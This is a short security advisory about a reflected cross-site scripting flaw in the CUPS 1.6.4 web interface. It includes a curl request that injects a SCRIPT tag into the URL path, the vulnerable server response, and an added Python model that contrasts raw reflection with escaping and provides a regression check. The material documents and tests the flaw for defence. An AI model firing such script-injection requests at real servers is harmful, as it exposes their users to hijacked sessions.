CUPS 1.6.4 web interface XSS

2014.04.14
Credit: Alex
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

There seems to be XSS possible when CUPS web-interface is accessed like:

http://cups-server-name:631/<SCRIPT>whatever</SCRIPT>.shtml

I cannot reproduce it with CUPS 1.7.1, but CUPS 1.6.4 is vulnerable.

Easy test:

$ curl "http://192.168.0.1:631/<SCRIPT>alert('document.domain='+document.domain)</SCRIPT>.shtml"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
<TITLE>Upgrade Required - CUPS v1.6.4</TITLE>
<LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css">
<META HTTP-EQUIV="Refresh" CONTENT="3;URL=https://192.168.0.1:631/<SCRIPT>alert('document.domain='+document.domain)</SCRIPT>.shtml">
</HEAD>
<BODY>
<H1>Upgrade Required</H1>
<P>You must access this page using the URL <A HREF="https://192.168.0.1:631/<SCRIPT>alert('document.domain='+document.domain)</SCRIPT>.shtml">https://192.168.0.1:631/<SCRIPT>alert('document.domain='+document.domain)</SCRIPT>.shtml</A>.</P>
</BODY>
</HTML>
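The response above shows the root cause: the request path is copied verbatim into the META refresh, the HREF attribute and the link text of the "Upgrade Required" page. The following is an added Python model of that page (not CUPS code, and not the fix from str4356.patch), rendering it once the way 1.6.4 does and once with the URL percent-encoded and HTML-escaped; the host and probe path are constructed placeholders.

```python
import html
from urllib.parse import quote

# Constructed values for the demonstration (placeholders, not a real server).
HOST = "192.168.0.1"
PROBE_PATH = "/<SCRIPT>alert(1)</SCRIPT>.shtml"

# Skeleton of the CUPS "Upgrade Required" page; the URL is inserted in three
# contexts: a META attribute, an HREF attribute and the anchor's text content.
TEMPLATE = (
    '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">\n'
    "<HTML><HEAD>\n"
    "<TITLE>Upgrade Required</TITLE>\n"
    '<META HTTP-EQUIV="Refresh" CONTENT="3;URL={url}">\n'
    "</HEAD><BODY>\n"
    "<H1>Upgrade Required</H1>\n"
    '<P>You must access this page using the URL <A HREF="{url}">{url}</A>.</P>\n'
    "</BODY></HTML>\n"
)


def render_vulnerable(host, request_path):
    """Reflect the request path verbatim, as the CUPS 1.6.4 response does."""
    return TEMPLATE.format(url=f"https://{host}:631{request_path}")


def sanitize_url_for_html(host, request_path):
    """Percent-encode the path so it is a valid URL, then HTML-escape the whole
    URL so it cannot terminate an attribute or open a tag in any context."""
    encoded_path = quote(request_path, safe="/?=&%")
    return html.escape(f"https://{host}:631{encoded_path}", quote=True)


def render_fixed(host, request_path):
    """Hardened variant: reflected URL is safe in attribute and text context."""
    return TEMPLATE.format(url=sanitize_url_for_html(host, request_path))


def reflects_raw_path(body, request_path):
    """Regression check: True if the request path appears unencoded in the body."""
    return request_path in body


if __name__ == "__main__":
    print("1.6.4-style page reflects raw path:",
          reflects_raw_path(render_vulnerable(HOST, PROBE_PATH), PROBE_PATH))
    print("hardened page reflects raw path:",
          reflects_raw_path(render_fixed(HOST, PROBE_PATH), PROBE_PATH))
```

The same `reflects_raw_path` check can be pointed at a live server's response body to confirm a deployed version no longer reflects the path unencoded.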

References:

http://www.cups.org/str.php?L4356
http://www.cups.org/strfiles.php/3268/str4356.patch

